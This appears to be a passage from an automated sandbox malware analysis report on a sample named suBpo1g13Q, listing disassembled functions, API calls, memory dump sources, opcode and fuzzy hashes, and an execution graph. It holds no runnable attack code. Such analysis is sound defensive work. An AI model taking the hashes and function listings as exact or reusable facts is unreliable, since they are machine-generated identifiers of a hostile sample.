                                                                                                                • Opcode Fuzzy Hash: 125dc6468a97226bd956063e532846807b3ac91be41d13f9bef36c5a8d85d065
                                                                                                                • Instruction Fuzzy Hash: 9D1136B1D003488FDB20DFAAC4457DEFBF8EB88324F24842AD419A7640C779A941CFA4
                                                                                                                Function 0296B118 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0296B17E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: fdc0ec9e7cd5fce31e4a74c5e565773fd9b3add3adcd3e24b5b15803df777df0
                                                                                                                • Instruction ID: bfbed8e5a41b07e2321e6dfe915d420749bf69dc54eb33e8aa793cb530c02101
                                                                                                                • Opcode Fuzzy Hash: fdc0ec9e7cd5fce31e4a74c5e565773fd9b3add3adcd3e24b5b15803df777df0
                                                                                                                • Instruction Fuzzy Hash: DD11E3B5D003499FDB20CF9AC448BDEFBF4EB48224F11842AD429B7210D375A545CFA5
                                                                                                                Function 072400B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 072408B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362320302.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7240000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: ef05486a4a5b1637aaa81eece1011d3781b99a10d58c7a0957bfde3765a7f8ba
                                                                                                                • Instruction ID: 3595418aa1cf8110240dac087c50d3ad9dd9d19a450bb5c76e8dac82d0916807
                                                                                                                • Opcode Fuzzy Hash: ef05486a4a5b1637aaa81eece1011d3781b99a10d58c7a0957bfde3765a7f8ba
                                                                                                                • Instruction Fuzzy Hash: 7C11F2B5800349DFDB20CF9AC585BDEBBF8EB48320F10845AE918A7310C375A984CFA5
                                                                                                                Function 07240852 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 072408B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362320302.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7240000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: 1555ba1d87d93adb2dcf5bf5163eef7210878028cb2dc57356e80012f0fbd72a
                                                                                                                • Instruction ID: 84cff67496788fe6869a77eb6780900f35934f75a2e343d09ba2d4f88e613a1b
                                                                                                                • Opcode Fuzzy Hash: 1555ba1d87d93adb2dcf5bf5163eef7210878028cb2dc57356e80012f0fbd72a
                                                                                                                • Instruction Fuzzy Hash: 991103B5800349DFDB20CF9AD945BDEFBF8EB48320F10841AE528A7610C375A984CFA1
                                                                                                                Function 012AD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356002801.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_12ad000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dee99e0aabb41efb22ee0a7a7b56460eb15a6e74622231c8dea536f0e3f17259
                                                                                                                • Instruction ID: 82b2e3a4793edac0a6b8627c08a5880468505d8fb9fd3688b2b653a345b445c0
                                                                                                                • Opcode Fuzzy Hash: dee99e0aabb41efb22ee0a7a7b56460eb15a6e74622231c8dea536f0e3f17259
                                                                                                                • Instruction Fuzzy Hash: A1216776510308DFEB05DF44D9C0B56BF65FB88324F60C16DEA090B656C376E456CBA2
                                                                                                                Function 012BD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356067557.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_12bd000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ec845fdcfb3c171f5102b951a28de838d646b8a2c988123af0565c2302f3a2fa
                                                                                                                • Instruction ID: 2124e72ddaa84e81e599021afdac5be3dca6945e9aae56ad711b2220cdd1808c
                                                                                                                • Opcode Fuzzy Hash: ec845fdcfb3c171f5102b951a28de838d646b8a2c988123af0565c2302f3a2fa
                                                                                                                • Instruction Fuzzy Hash: BC217971514308DFDB14DF54D4C0B92BB61FB84398F20C96DD9090B242C377D407CA62
                                                                                                                Function 012BD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356067557.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_12bd000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3e59f9a4b0f91ec4192742c52f8dd53474d8cb056c61983d981afbbbc1a83035
                                                                                                                • Instruction ID: d139dbe965b2c789e8b0066f8be08d0ee1505d8eee15a7d6ae1aaabcca75c16b
                                                                                                                • Opcode Fuzzy Hash: 3e59f9a4b0f91ec4192742c52f8dd53474d8cb056c61983d981afbbbc1a83035
                                                                                                                • Instruction Fuzzy Hash: 78214971514388EFEB05DF94D5C0B95BB65FB84328F20C56DE9094B243C376D846CB61
                                                                                                                Function 012BD006 Relevance: .1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356067557.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_12bd000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7a56e840c508f00548f4b9838461d8ce51e818c9983d2c6767b143014d14e26
                                                                                                                • Instruction ID: fad54e66710ed443d83f67a68284dde59e80b6114db026013d93689c94b904a4
                                                                                                                • Opcode Fuzzy Hash: d7a56e840c508f00548f4b9838461d8ce51e818c9983d2c6767b143014d14e26
                                                                                                                • Instruction Fuzzy Hash: CD2180755083849FCB02CF64D9D4B51BF71EB46314F28C5DAD9498F2A7C33A981ACB62
                                                                                                                Function 012AD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356002801.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_12ad000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a736483c7301ab0b942446287a2da93ee8c90a3553c7a0be40e84c1f23337044
                                                                                                                • Instruction ID: f13d7168fb658a904a5db62e52884e09a357ee3951d3b5e86a1f279989fc8f55
                                                                                                                • Opcode Fuzzy Hash: a736483c7301ab0b942446287a2da93ee8c90a3553c7a0be40e84c1f23337044
                                                                                                                • Instruction Fuzzy Hash: D9112676404284CFDB06CF44D5C4B56BF71FB84324F24C2A9D9090B657C33AE456CBA1
                                                                                                                Function 012BD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356067557.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_12bd000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: af0032d31c21eee98164703ed9ecbad4511e5bcd2f12e312fdd1ff5dc5c24f5f
                                                                                                                • Instruction ID: 02cb43abf91664cee30a814ce9191cab259b5ef70ff9e2bcfa5bfe4114b1836c
                                                                                                                • Opcode Fuzzy Hash: af0032d31c21eee98164703ed9ecbad4511e5bcd2f12e312fdd1ff5dc5c24f5f
                                                                                                                • Instruction Fuzzy Hash: 2311BB75544284DFDB06CF54C5C0B95BFA1FB84328F24C6A9D9494B297C33AD80ACB61
                                                                                                                Function 012AD731 Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356002801.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_12ad000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f68507f91828ba433f680718cbb82f0e938533596cc436c44795a4b46f718ba
                                                                                                                • Instruction ID: ef744c29ca50d6111f14027e8f2083a0530f45bb914339075ecdbbe840eea9f9
                                                                                                                • Opcode Fuzzy Hash: 0f68507f91828ba433f680718cbb82f0e938533596cc436c44795a4b46f718ba
                                                                                                                • Instruction Fuzzy Hash: 4001DB314143889BF7184E65CDC4777FFD8DF41724F54C41AEE195E582D6B89880CAB2
                                                                                                                Function 012AD730 Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356002801.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_12ad000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4ec99e9d038309ed056dc87691fe5ab9070ccb82c6f5f8abdf4defb08d462cce
                                                                                                                • Instruction ID: e4f9d0f2afc91555448b3640fc8c71d2ffb1d0bd14d97404e8e106627a5e1799
                                                                                                                • Opcode Fuzzy Hash: 4ec99e9d038309ed056dc87691fe5ab9070ccb82c6f5f8abdf4defb08d462cce
                                                                                                                • Instruction Fuzzy Hash: ABF06272405384AFE7148A19CD84B66FFD8EB81734F18C55AEE185E692C2799844CAB1

                                                                                                                Non-executed Functions

                                                                                                                Function 071DD500 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9926d98e7334a7e3f53603fbdd163f7367368fe2380508200f4641e9f1108848
                                                                                                                • Instruction ID: 50780c315b64b571b082dea115cc805a22e325a1f9b60939766ff7d4034854ff
                                                                                                                • Opcode Fuzzy Hash: 9926d98e7334a7e3f53603fbdd163f7367368fe2380508200f4641e9f1108848
                                                                                                                • Instruction Fuzzy Hash: 1CE12DB4E0025A8FDB14DFA8D581AAEFBB2FF49304F24816AD454AB355D731AD41CFA0
                                                                                                                Function 071DB428 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ee83e6451f0c3a6dffcdee1c613dbbb82aafb2d42b0d97b9daf6a249bce570c8
                                                                                                                • Instruction ID: c08ed346840586699df83019b8db0533f27b061db98b45a4ebfc5eb6ca2d5811
                                                                                                                • Opcode Fuzzy Hash: ee83e6451f0c3a6dffcdee1c613dbbb82aafb2d42b0d97b9daf6a249bce570c8
                                                                                                                • Instruction Fuzzy Hash: 0DE12BB4E042598FDB24DFA9C581AAEFBB2FF89304F248169D415A7355C730AD41CF60
                                                                                                                Function 071DAFF0 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e2b6d11919eea92ae3eb4eb4b9136beab329cbd9a1c1b54be06807b295d3b32
                                                                                                                • Instruction ID: f29fc55c25ed0b9361fcb991a9738af88f4f20e37814c3f98a8787646682e0cf
                                                                                                                • Opcode Fuzzy Hash: 8e2b6d11919eea92ae3eb4eb4b9136beab329cbd9a1c1b54be06807b295d3b32
                                                                                                                • Instruction Fuzzy Hash: 43E13CB4E042598FDB24DF99C580AAEFBB2FF49304F248169D415A7356DB30AD42CF60
                                                                                                                Function 071DCC28 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3462e6a9b822f3b31e90dd2d637b9c07073d2a3999130f0fd33baa2fa059bd44
                                                                                                                • Instruction ID: f5acdd722affb13858edac7e3073ed84b2e98fa51848df7c3692d9d7de33af0e
                                                                                                                • Opcode Fuzzy Hash: 3462e6a9b822f3b31e90dd2d637b9c07073d2a3999130f0fd33baa2fa059bd44
                                                                                                                • Instruction Fuzzy Hash: B2E12CB4E1025A8FDB14DFA8C591AAEFBB2FF89304F248169D414A7355D730AD42CFA0
                                                                                                                Function 071DABB8 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cc3cea4acf02a1c2f74cd74bae2efcad2884436860d4cd22b578916662372a19
                                                                                                                • Instruction ID: 30b35a9c621596fac986627c6ec696cbb216539db063dde6473b69c8191acf0e
                                                                                                                • Opcode Fuzzy Hash: cc3cea4acf02a1c2f74cd74bae2efcad2884436860d4cd22b578916662372a19
                                                                                                                • Instruction Fuzzy Hash: 7DE10AB4E1025A8FDB14DFA9C590AAEFBB2BF89305F24C169D414AB356D730AD41CF60
                                                                                                                Function 0296D584 Relevance: .3, Instructions: 264COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f7323f1a8af362c5febdd719fbf82780e8041b1c4353f59fd47237c32fa67439
                                                                                                                • Instruction ID: 3cc06c0052c5bd87d736ac1a253acf8a81fb44fb4756b6ed0f90666705f03f16
                                                                                                                • Opcode Fuzzy Hash: f7323f1a8af362c5febdd719fbf82780e8041b1c4353f59fd47237c32fa67439
                                                                                                                • Instruction Fuzzy Hash: 6EA19136E002098FCF05DFB4D8485AEBBF6FF85304B15856AE806AB655DB71E946CF80
                                                                                                                Function 071DCC18 Relevance: .1, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6845b7434fb456f4136f82034e05fc2f1ed91a758fa4bf72bcfe7f37ada4d73c
                                                                                                                • Instruction ID: 381ed1ffbe0442dd5f3ee205acbb0f282eec4a795290f86f0cc3e65b38844c3d
                                                                                                                • Opcode Fuzzy Hash: 6845b7434fb456f4136f82034e05fc2f1ed91a758fa4bf72bcfe7f37ada4d73c
                                                                                                                • Instruction Fuzzy Hash: 1E515CB4E102198FCB14CFA9C9815AEFBB2FF89304F24856AD418A7356C7319D41CFA1
                                                                                                                Function 071DD4F0 Relevance: .1, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1362096841.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_71d0000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: aa295cc453b20c124c291d272846fa9643aa5f1a8c9f172d4822ffdcd48711a3
                                                                                                                • Instruction ID: 292698b324d7c1b0dd5b8df8e0cc3f4cac5938fbe79df100883d1d40826af3a8
                                                                                                                • Opcode Fuzzy Hash: aa295cc453b20c124c291d272846fa9643aa5f1a8c9f172d4822ffdcd48711a3
                                                                                                                • Instruction Fuzzy Hash: 12513EB0E002198FDB14DFA9D5815AEFBF2BF89304F24816AD458A7356DB319D42CFA1

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:1.2%
                                                                                                                Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                Signature Coverage:8.1%
                                                                                                                Total number of Nodes:135
                                                                                                                Total number of Limit Nodes:11
                                                                                                                execution_graph 95381 430103 95382 430113 95381->95382 95383 430119 95381->95383 95386 42f143 95383->95386 95385 43013f 95389 42d2c3 95386->95389 95388 42f15b 95388->95385 95390 42d2e0 95389->95390 95391 42d2ee RtlAllocateHeap 95390->95391 95391->95388 95431 430233 95432 4301a3 95431->95432 95433 42f143 RtlAllocateHeap 95432->95433 95434 430200 95432->95434 95435 4301dd 95433->95435 95436 42f063 RtlFreeHeap 95435->95436 95436->95434 95392 425663 95393 42567c 95392->95393 95394 4256c7 95393->95394 95397 42570a 95393->95397 95399 42570f 95393->95399 95400 42f063 95394->95400 95398 42f063 RtlFreeHeap 95397->95398 95398->95399 95403 42d313 95400->95403 95402 4256d7 95404 42d32d 95403->95404 95405 42d33b RtlFreeHeap 95404->95405 95405->95402 95437 42c613 95438 42c630 95437->95438 95441 14e2df0 LdrInitializeThunk 95438->95441 95439 42c655 95441->95439 95442 4252d3 95443 4252ef 95442->95443 95444 425317 95443->95444 95445 42532b 95443->95445 95446 42cfc3 NtClose 95444->95446 95447 42cfc3 NtClose 95445->95447 95448 425320 95446->95448 95449 425334 95447->95449 95452 42f183 RtlAllocateHeap 95449->95452 95451 42533f 95452->95451 95406 414343 95409 42d233 95406->95409 95410 42d250 95409->95410 95413 14e2c70 LdrInitializeThunk 95410->95413 95411 414365 95413->95411 95414 4148a3 95415 4148bc 95414->95415 95420 418073 95415->95420 95417 4148da 95418 414926 95417->95418 95419 414913 PostThreadMessageW 95417->95419 95419->95418 95421 418097 95420->95421 95422 4180d3 LdrLoadDll 95421->95422 95423 41809e 95421->95423 95422->95423 95423->95417 95453 4196d3 95454 419703 95453->95454 95456 41972f 95454->95456 95457 41bb83 95454->95457 95458 41bbc7 95457->95458 95459 41bbe8 95458->95459 95460 42cfc3 NtClose 95458->95460 95459->95454 95460->95459 95461 401bb5 95463 401b96 95461->95463 95462 401bd6 95463->95462 95466 4305d3 95463->95466 95469 42ec13 95466->95469 95470 42ec39 95469->95470 95481 407703 95470->95481 95472 42ec4f 95480 401ca8 95472->95480 95484 41b993 95472->95484 95474 42ec6e 95478 42ec83 95474->95478 95499 42d353 95474->95499 95477 42ec9d 95479 42d353 ExitProcess 95477->95479 95495 428ba3 95478->95495 95479->95480 95483 407710 95481->95483 95502 416d33 95481->95502 95483->95472 95485 41b9bf 95484->95485 95520 41b883 95485->95520 95488 41b9ec 95489 41b9f7 95488->95489 95492 42cfc3 NtClose 95488->95492 95489->95474 95490 41ba04 95491 41ba20 95490->95491 95493 42cfc3 NtClose 95490->95493 95491->95474 95492->95489 95494 41ba16 95493->95494 95494->95474 95496 428c05 95495->95496 95498 428c12 95496->95498 95531 418ed3 95496->95531 95498->95477 95500 42d36d 95499->95500 95501 42d37e ExitProcess 95500->95501 95501->95478 95503 416d50 95502->95503 95505 416d63 95503->95505 95506 42d9f3 95503->95506 95505->95483 95508 42da0d 95506->95508 95507 42da3c 95507->95505 95508->95507 95513 42c663 95508->95513 95511 42f063 RtlFreeHeap 95512 42dab2 95511->95512 95512->95505 95514 42c680 95513->95514 95517 14e2c0a 95514->95517 95515 42c6a9 95515->95511 95518 14e2c1f LdrInitializeThunk 95517->95518 95519 14e2c11 95517->95519 95518->95515 95519->95515 95521 41b89d 95520->95521 95525 41b979 95520->95525 95526 42c6f3 95521->95526 95524 42cfc3 NtClose 95524->95525 95525->95488 95525->95490 95527 42c710 95526->95527 95530 14e35c0 LdrInitializeThunk 95527->95530 95528 41b96d 95528->95524 95530->95528 95532 418efd 95531->95532 95538 41940b 95532->95538 95539 414523 95532->95539 95534 41902a 95535 42f063 RtlFreeHeap 95534->95535 95534->95538 95536 419042 95535->95536 95537 42d353 ExitProcess 95536->95537 95536->95538 95537->95538 95538->95498 95540 414543 95539->95540 95542 4145ac 95540->95542 95544 41bca3 RtlFreeHeap LdrInitializeThunk 95540->95544 95542->95534 95543 4145a2 95543->95534 95544->95543 95424 419628 95427 42cfc3 95424->95427 95426 419632 95428 42cfe0 95427->95428 95429 42cfee NtClose 95428->95429 95429->95426 95545 41497d 95546 414903 95545->95546 95549 414983 95545->95549 95547 414926 95546->95547 95548 414913 PostThreadMessageW 95546->95548 95548->95547 95430 14e2b60 LdrInitializeThunk

                                                                                                                Executed Functions

                                                                                                                Function 00418073 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 193 418073-41808f 194 418097-41809c 193->194 195 418092 call 42fc43 193->195 196 4180a2-4180b0 call 430243 194->196 197 41809e-4180a1 194->197 195->194 200 4180c0-4180d1 call 42e6e3 196->200 201 4180b2-4180bd call 4304e3 196->201 206 4180d3-4180e7 LdrLoadDll 200->206 207 4180ea-4180ed 200->207 201->200 206->207
                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004180E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                • Instruction ID: cc92ade5e26e6fe28326d7d360432aee68fdf9963b73913c3c71af3ad9a56c06
                                                                                                                • Opcode Fuzzy Hash: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                • Instruction Fuzzy Hash: 950175B1E0010DA7DF10DBE1DC52FDEB7789B58304F0041AAE90897240F635EB48CB55
                                                                                                                Function 0042CFC3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 218 42cfc3-42cffc call 404a23 call 42e1d3 NtClose
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CFF7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 39452f28565ae4620622cddfb96962eeb8732a42bf1b94520a18f89472db538c
                                                                                                                • Instruction ID: 4c9b6845df2e633885d5ea462548a0d9519ba916f9f04643a3ab92386f56ff31
                                                                                                                • Opcode Fuzzy Hash: 39452f28565ae4620622cddfb96962eeb8732a42bf1b94520a18f89472db538c
                                                                                                                • Instruction Fuzzy Hash: 3CE086323402147BC620EA5AEC01F97B76CDFC5714F004429FE08A7142C674B91587F9
                                                                                                                Function 014E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 232 14e2b60-14e2b6c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 30848a622e99c84f414daa2abdf43356d95c5cef2d9e2658dcaec0dcbd28a54d
                                                                                                                • Instruction ID: a4175c3bf45c4cc275ece34eeff2e3884f887386091a8f3d066957cdcc2c2f79
                                                                                                                • Opcode Fuzzy Hash: 30848a622e99c84f414daa2abdf43356d95c5cef2d9e2658dcaec0dcbd28a54d
                                                                                                                • Instruction Fuzzy Hash: 6F90026160240103450571584414616400AD7F1201B55C026E20149A1DC735C9A56225
                                                                                                                Function 014E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 234 14e2df0-14e2dfc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 00ab63f9ef8e81966b746e13758ab361d59b5ba028144b38ce8ba2053dde1a37
